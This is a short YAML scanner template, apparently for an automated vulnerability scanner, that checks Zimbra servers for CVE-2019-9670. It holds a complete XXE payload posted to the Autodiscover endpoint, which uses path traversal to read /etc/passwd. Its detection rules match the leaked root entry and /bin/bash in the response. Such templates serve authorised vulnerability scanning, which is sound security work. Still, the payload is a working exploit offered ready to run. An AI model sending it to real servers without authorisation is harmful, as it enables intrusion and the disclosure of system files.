id: CVE-2019-9670
info:
  name: Zimbra RCE
  risk: Critical

params:
  - root: '{{.BaseURL}}'

variables:
  - exp: |
      file:./../../../../../etc/passwd

requests:
  - method: POST
    redirect: false
    url: >-
      {{.root}}//Autodiscover/Autodiscover.xml
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: text/xml
    body: |
      <!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "{{.exp}}" >]><Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"><Request><EMailAddress>test@test.com</EMailAddress><AcceptableResponseSchema>&xxe;</AcceptableResponseSchema></Request></Autodiscover>
    detections:
      - >-
        StringSearch("response", "zmmailboxd.out") && StringSearch("response", "Requested response schema not available")
      - >-
        RegexSearch("resBody", "root:[x*]:0:0:") && StringSearch("response", "/bin/bash")

references:
  - https://www.cvebase.com/cve/2019/9670